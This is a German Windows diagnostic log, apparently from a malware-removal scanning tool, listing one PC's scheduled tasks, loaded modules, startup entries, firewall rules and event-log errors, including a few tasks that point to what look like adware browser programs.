Task: {396A2551-0AB1-4FE9-BED9-F057CF29CB2B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {48BCCA7F-E9A5-4128-8E37-AE55AEFECA8E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {4F5C5854-312A-4A24-ABDF-3C644FC226F6} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997} - System32\Tasks\eAHPeNhIUJCheckTask => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {5A0191B5-5F68-4856-A343-DE3E25F99E5C} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {5D51534D-F177-4E19-B56B-21112F1A3483} - System32\Tasks\ffgogogoBrowserUpdateCore => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {6152FDF3-58E5-498E-9CF3-A9D7D429B80B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd)
Task: {671B6DA2-50FC-4121-874E-571D617F7B32} - System32\Tasks\eAHPeNhIUJBrowserUpdateCore => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {6EEAF9D3-CC5F-4E6C-AC88-9DE7780771E9} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {70BAF52C-C324-4265-94E7-6336FBE7590E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-15] (Microsoft Corporation)
Task: {732820F9-0FDC-4FC9-963F-25C3A2BA94B2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-03-29] (AVG Technologies CZ, s.r.o.)
Task: {7E44129D-761D-427B-8DC4-16D8E966F159} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {8D3866F9-766B-48DB-A578-5C21B7EA69AC} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {92C84F68-7305-4AC7-833F-BA67477E36CA} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC} - \Microsoft\Windows\File Classification Infrastructure\Property Definition Sync -> Keine Datei <==== ACHTUNG
Task: {A1AE644B-6680-4D57-99C4-1FE32BE13D5B} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {A65B8F6D-A713-47F9-BB7D-735498D1C450} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {AE71EAE0-A9B0-45EB-AC26-7137D2C92B00} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {B1CD5B0C-693D-4B7C-8323-C9FD491903EE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {BAAAEC1C-119B-4660-A593-B5D97C4B8E6F} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {BCE21238-B804-496C-973D-49332B4BC6AE} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {C4675849-A54C-4834-BC5A-7D6ABA4BBB54} - System32\Tasks\eAHPeNhIUJBrowserUpdateUA => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {C5625BD7-9D7F-45B0-8F71-CA915B4E0814} - System32\Tasks\Microsoft\Windows Embedded\Embedded App Launcher Startup => C:\Windows\system32\embeddedapplauncher.exe [2015-07-10] (Microsoft Corporation)
Task: {C6EA2FDA-643C-4333-A577-9FC6BC26272E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {CB480BD6-186E-467C-B81B-091E970277CF} - System32\Tasks\ffgogogoCheckTask => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {CB660142-85F0-4F75-BF5F-CB86DACA85E2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {CB6A3A7A-6827-4E97-90B5-33E9ED0C759B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {D128CD79-AA9A-4682-9905-F14DB406D448} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {DADEF66A-B64F-42F7-84E8-039E9C3B9E69} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {DC4BE421-18AF-4C9E-9FFF-D48C8C6478E4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E653ACD2-7CC0-4B7B-9D01-730295A1F3D8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {E6589D93-3FA5-49AF-9B33-493ACA29767E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {E7892EEF-4D43-4930-B9D0-5C8888186A36} - System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {E95F50C4-F888-4E6C-BAC1-02665CC2F866} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-04-06] (Hewlett-Packard)
Task: {EE3BDAA5-ED46-440A-8650-A160485AA160} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-07-10 13:00 - 2015-07-10 13:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-07-29 23:03 - 2015-07-15 04:04 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:06 - 2015-08-11 11:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-01 20:56 - 2015-08-02 16:03 - 00076152 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-19 12:34 - 2016-04-19 12:34 - 00959176 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2015-10-01 09:51 - 2015-09-17 07:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-10 13:38 - 2015-11-25 06:20 - 06569472 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 00471040 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 01808384 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 09:51 - 2015-09-17 07:43 - 02274816 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\Temp:$DATA [16]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2630849102-760198568-3561441068-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "StartCN"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "PlaysTV"
HKLM\...\StartupApproved\Run32: => "mbot_en_037050261"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\StartupFolder: => "Xfire2.bat"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "BingSvc"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EF9BA6B0-D956-4E04-A56D-B2D010471C6C}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{8C66906E-1DAA-4F0B-88E4-E0163476C022}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B3BD4173-9D91-493E-9FA0-7BCAB414DBB8}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{04697792-0727-44EB-82BB-90E6B7E101BA}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{29D5CD28-05A0-4A40-8780-02DADE66DA50}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{3E4AF0F9-5D5F-47A5-89C3-8483E1874B3C}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{632E65A2-F35B-4491-A894-4259D389B688}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{DA65680E-6E44-4201-B745-F198AC8E3393}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{52257645-0630-45E9-A1FB-39934F6C2678}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{4FE86D86-4126-4CAC-B0C6-0964BDDF3F14}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [{79EA3DA0-E438-4DF1-B00E-395F81892905}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9074E1C2-24F4-4C85-931B-F7C36B46E9F0}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{88748628-27A1-4BE3-A512-B5BEDB3F0CBC}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{1064F6A1-CED6-4E5B-9557-D4C9CE2276C3}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{F2EF9A12-86E9-472C-A3D4-94A1F9A17C0A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{EAA7D367-AABF-426D-BB3F-EF9A70667017}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{98D524D2-5FAB-47A1-8D96-609F4621339A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{54390D52-B160-4427-922D-9E33F5445695}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5AAA1481-9998-4568-8A9B-D962D4EC35DF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AFF1319A-917A-4107-A1B8-16C203B38CE3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6E5BD0D9-0928-42F6-B0CC-6822D671F49E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{4EF4C32F-BB8F-4765-B97F-A9006BD42435}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6B0C9A6B-F6E7-4A35-9EB7-6D1B664D401A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D0D01B7E-5143-44D9-AC6A-CC67DA9DC212}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [{F3E54CC2-1149-412B-936A-B7B404D80F42}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [TCP Query User{7198F59F-7EF5-4103-881C-0D8F7DF8701B}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [UDP Query User{80C05AF5-C686-4759-B28B-9A8FEF736C4C}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [{277B4264-74AC-4424-97C4-6D6C0796EF8F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{29E298B7-7591-4640-AD04-9B5F1E53CBA1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E35884C9-26D9-4EAD-9D40-2E56C22777E7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{085256D1-31AD-4037-8168-D364B01EBC13}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{B4514ECE-E440-46E1-B1D2-26717681B1E0}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{6A8D13A6-8290-4176-8559-5F33EC7ED562}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{821D4B6B-A2AB-4689-9063-D6F980672A77}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D00ED757-645B-41E0-BFF0-EFEEBB5995ED}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{823DAAEE-6ABF-4B05-BDB9-383B0D21FE83}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{BB735679-47B3-409A-8738-29CA284AA409}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{6EE9145F-17C0-43E7-87FF-67A36AF241E7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{97AB465D-9EFC-47C7-BF64-913694D80FCA}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{19645894-3D5C-4408-A5F6-9B66DFB1DC9F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{AA0EA854-6DFB-4B81-8D5C-1056DC11E33C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1FB21FF6-AB11-484B-8ADB-638F34153E99}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{48F1500B-0F5A-488B-A6C2-4E310ADB9290}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2DB1B594-3330-4CBE-9C2C-A9AE295E4933}] => (Allow) C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\chrome.exe
FirewallRules: [{3C2F26B4-E13F-4E26-B187-60BDB19D986F}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{16CB5095-C60B-4A9A-AF40-FFF4FF667E4A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{302047B4-E0E7-4AE6-96B2-BDD4D5C4307D}] => (Allow) A:\iTunes.exe
FirewallRules: [{4C2E216B-3F5D-4DC6-B3E5-D777C482C8FC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4

Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll4

Error: (04/16/2016 10:01:24 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm SndVol.exe, Version 10.0.10240.16384 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1b34

Startzeit: 01d197b0a249f565

Beendigungszeit: 2

Anwendungspfad: C:\Windows\System32\SndVol.exe

Berichts-ID: 676b8fbe-03a9-11e6-9c27-bcaec571bf31

Vollständiger Name des fehlerhaften Pakets: 

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:35 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.


Systemfehler:
=============
Error: (04/19/2016 04:19:13 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Xbox Live Authentifizierungs-Manager" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
%%0

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "AVG PC TuneUp Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 250 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "PnkBstrA" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MPC Core Protect Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/19/2016 04:11:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "AVG Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.


CodeIntegrity:
===================================
  Date: 2016-04-19 17:59:05.188
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:05.092
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:05.014
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.936
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.854
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.765
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.671
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.514
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.421
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-19 17:59:04.327
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 22%
Installierter physikalischer RAM: 8173.24 MB
